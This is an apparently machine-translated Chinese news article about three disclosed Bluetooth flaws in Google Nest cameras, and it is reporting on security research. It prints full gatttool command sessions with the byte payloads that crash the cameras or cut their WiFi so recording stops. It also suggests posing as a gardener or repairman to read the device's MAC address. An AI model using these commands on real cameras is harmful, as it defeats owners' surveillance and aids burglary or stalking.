Google Nest特色监控摄像头可通过蓝牙轻松关闭


人工智能用于检测人

高科技保护不一定总是最好的。 通过增加系统的复杂性,您可以添加新的攻击媒介。 碰巧的是,劫机者比起旧的“铁东西”,更容易用无线电钥匙偷走最昂贵,最现代的汽车 。 与其他区域的安全性大致相同。

饼干的另一个受害者是精美的Google Nest监控摄像头-Dropcam,Dropcam Pro,Nest Cam Outdoor和Nest Cam型号。 用于黑客攻击它们的代码已经在GitHub上发布 ,而Google尚未发布补丁。 您可以立即练习关闭监控摄像头(当然是您自己)。

有关三个漏洞的信息已发布,所有这些漏洞均提供了通过Bluetooth 4.0 LE连接到摄像机的能力(根据规格,范围约为100 m)。 蓝牙始终在这些相机中起作用,也就是说,即使对于所有者,通常也无法将其关闭。

第一个漏洞是带有SSID over Bluetooth选项的缓冲区溢出。 要导致缓冲区溢出,您需要尝试在摄像机上设置一个具有错误特征的新SSID参数。

这是连接到摄像机并一次将SSID长度设置为1和16字节的示例。

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.


结果,相机将关闭,出现错误后重新启动,并返回其正常操作状态。

第二个漏洞与第一个漏洞相似,只是在这里缓冲区溢出是由发送错误长度的密码(在这种情况下为三个字节和一个字节)引起的。 结果是相同的-相机在出现错误后重新启动,并恢复到工作状态。

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.


第三个漏洞更有趣。 它可以让您暂时断开相机与WiFi网络的连接,并为其传递新的SSID进行连接。 在这些相机中,本地视频不可用,因此相机通过WiFi传输所有内容-整个存档存储在云服务中。 因此,在断开网络连接期间,将不会保存视频记录。 发生此类骇客并恢复视频录制后,相机需要大约60-90秒的时间才能恢复使用。 原则上讲,间隔时间不算长,但是可以在必要的时间段内循环入侵。

anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b0a6574536d6172742d356e1a20232320
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3becb824ba437c13233ac2ff78b1776456e47a01
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3ca5787d2f5e53f394a512200228003210bc9253
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3d48cada7a0d921d57b2d26ae89c3a04DEADBEEF
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3e
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>


请注意,在所有示例中,要连接到摄像机,您都需要知道其MAC地址(18:B4:30:5D:00:B8)。 它只是写在相机机身上,因此在实际操作中,您首先必须在相当近的距离接近相机。 例如,假借割草机,修理工或未来受害者的朋友的幌子。


Nest Outdoor Cam的一张照片显示MAC地址写在了相机机身上(QR码上方的一行)。 开发人员谨慎地将其隐藏在电源线后面

最新的相机固件(5.2.1)中存在三个相机漏洞。 安全专家Jason Doyle于去年秋天找到了它们。 他说自己是在2016年10月26日向Google报告的,所以现在看来​​每个人都应该公开。 如果制造商不着急或没有时间在合理的时间内修复错误,则这是标准做法。 在这种情况下,已经过去了将近五个月。

Google通常会因发现产品中的漏洞而向研究人员奖励。 Google的漏洞奖励还扩展到Nest便携式摄像机。 的确,Nest是排名第三的最有名望的类别,其最高奖励仅为5,000美元(其余产品的奖励为31,337美元)。 此外,在第三类中,有一个关于六个月沉默期的特别说明。 尽管Google本身最近披露了90天后( 1,2 )在Windows和Edge上被积极利用的0day。

杰森·道尔(Jason Doyle)无法忍受六个月的时间(10月26日至3月17日),因此他将无法申领该奖项。 与通常的做法不同,Google并未将关闭漏洞的大概期限通知研究人员,也不支持与他进行通信。 同时,熟悉情况的消息人士告诉The Register ,补丁已经准备就绪,因此Jason不能忍受他的大部分奖励。

顺便说一句,建立WiFi连接后,其他一些类似的监控摄像头也会关闭蓝牙,因此它们将无法以这种方式破解(例如Logitech Circle)。 Google也可以通过这种简单的技巧来摆脱这种类型的漏洞。

Source: https://habr.com/ru/post/zh-CN402499/


All Articles